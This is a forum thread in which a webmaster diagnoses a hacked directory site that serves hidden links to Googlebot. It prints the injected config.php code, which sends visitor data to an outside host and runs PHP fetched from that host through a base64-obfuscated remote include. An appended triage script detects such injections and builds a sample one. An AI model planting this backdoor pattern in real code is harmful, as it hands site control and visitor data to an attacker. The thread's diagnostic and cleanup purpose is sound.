Site Compromised


pboz
04-08-2007, 04:02 PM
My site at www.australianmusicdirectory.com (http://www.australianmusicdirectory.com) has been hacked. It is using version 2.0
The hack includes a series of links that are inserted above the <html> tag, but they are only visible if the user agent is set to Google Bot

The top of the page code from a "view source" is at the bottom of this post.
You can also see the inserted links in Google cache (http://72.14.253.104/search?q=cache:-WYmPdNpOdgJ:www.australianmusicdirectory.com/organisations/%3Fs%3DA+site:www.australianmusicdirectory.com&hl=en&ct=clnk&cd=2&gl=au)

I'm not saying that it is necessarily a directory vulnerability; it may be that access was gained via some other script on the server. However, the problem I'm having is tracking down the hacked file(s) so I can correct it. Has anybody come across this attack before? Do you know which file(s) have been changed?



James
04-09-2007, 05:28 AM
Couple of things to check.

If it's not in the template files and not in the index.php,
empty out your temp/templates folder.
If all is OK, check your .htaccess file for a
php_value auto_prepend_file
If it's not there then let's move on.
After all that, this is probably a server hack (or your host) using the PHP prepend in php.ini or Apache mod_layout ...

pboz
04-09-2007, 01:16 PM
Thanks Dawzz.
I went through the code once again and this time I found what appears to be the cause.

In include/config.php, there was a line:
error_reporting(0); // suppress warnings so a failed remote include stays silent
// Collect request details, falling back to the old register_globals names
$a = (isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
$b = (isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
$c = (isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
$g = (isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
$h = (isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
$n = (isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
// Pack them into a dot-separated string of base64 values sent as the query string
$str = base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($g).".".base64_encode($h).".".base64_encode($n);
// "aHR0cDovLw==" decodes to "http://" and "dXNlcjcucGhwaW5jbHVkZS5ydQ==" to "user7.phpinclude.ru".
// The remote host receives host, URI, user agent, client address and referer on every request
// and returns the PHP that gets executed, which is consistent with the links only showing for
// the Googlebot user agent. The second include_once is a retry if the first one fails.
if ((include_once(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcucGhwaW5jbHVkZS5ydQ==")."/?".$str))) {
} else {
    include_once(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcucGhwaW5jbHVkZS5ydQ==")."/?".$str);
}

commenting it out eliminates the issue. I see that similar code exists in some other files.

I notice the version I am running is version 2.0.0 RC5.2 - I think the solution is to delete all files and upgrade.

thanks for your help!

Boby
04-10-2007, 10:54 PM
And make sure after you re-install to drop write permissions on all files and folders except /temp/.

pboz
04-11-2007, 03:17 AM
Yes, put config.php permissions back to 644.

It appears to me that I probably mistakenly left config.php at 777 when I did the original install; I think it is most likely the hacker gained access via some other script on the shared server, and hence got into config.php because of the permissions.

I don't believe it was a vulnerability in phpLD itself.

I've deleted all files on the server, and upgraded to the latest version 2, and all looks good.
Thanks very much for your help!
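The checks the thread walks through (James's auto_prepend_file hint, the base64-obfuscated include found in include/config.php, and the world-writable file permissions) as one triage script. This is an added example, not code from the thread or from phpLD; it takes a document root as its argument, and the sample tree it builds, the file paths and the example.invalid host are all constructed.

```shell
#!/bin/sh
# Added triage script (not from the thread or phpLD). Run as: sh triage.sh /path/to/docroot

# .htaccess / php.ini / .user.ini that auto-prepend a file run it before every script,
# which produces exactly this "code above the <html> tag" symptom.
find_prepend_directives() {
    find "$1" -type f \( -name .htaccess -o -name php.ini -o -name .user.ini \) \
        -exec grep -Hn -E 'auto_(prepend|append)_file' {} \; 2>/dev/null
}

# include/require of a base64_decode()'d string: the pattern found in config.php,
# where the URL of the remote host is assembled at run time to hide it from a plain grep.
find_remote_includes() {
    find "$1" -type f -name '*.php' -exec grep -l -E \
        '(include|require)(_once)?[[:space:]]*\(?[[:space:]]*base64_decode' {} \; 2>/dev/null
}

# Files anyone on the host can write (mode ...7), the likely way config.php got modified.
find_world_writable() {
    find "$1" -type f -perm -002 2>/dev/null
}

# Cloaking check: fetch a URL once as a browser and once as Googlebot and diff the bodies.
# Needs network and curl, so the offline demo below does not call it.
diff_by_user_agent() {
    curl -s -A 'Mozilla/5.0' "$1" > "/tmp/ua_browser.$$"
    curl -s -A 'Googlebot/2.1 (+http://www.google.com/bot.html)' "$1" > "/tmp/ua_bot.$$"
    diff "/tmp/ua_browser.$$" "/tmp/ua_bot.$$"; rm -f "/tmp/ua_browser.$$" "/tmp/ua_bot.$$"
}

# Constructed sample document root (one injected config.php, one clean index.php)
# so the checks can be exercised offline; prints the directory it created.
make_sample_root() {
    root=$(mktemp -d)
    mkdir -p "$root/include" "$root/templates"
    printf 'php_value auto_prepend_file /tmp/x.php\n' > "$root/.htaccess"
    printf '<?php\nerror_reporting(0);include_once(base64_decode("aHR0cDovLw==")."example.invalid/?".$q);\n' \
        > "$root/include/config.php"
    printf '<?php echo "clean";\n' > "$root/index.php"
    chmod 777 "$root/include/config.php"
    chmod 644 "$root/index.php"
    echo "$root"
}

if [ -n "$1" ]; then
    echo "== auto_prepend/append directives =="; find_prepend_directives "$1"
    echo "== base64-obfuscated includes ==";      find_remote_includes "$1"
    echo "== world-writable files ==";            find_world_writable "$1"
fi
```

Any hit from the first two checks is a file to inspect, not proof on its own; a legitimate auto_prepend_file set by the host is possible, so compare against the hosting documentation before removing it.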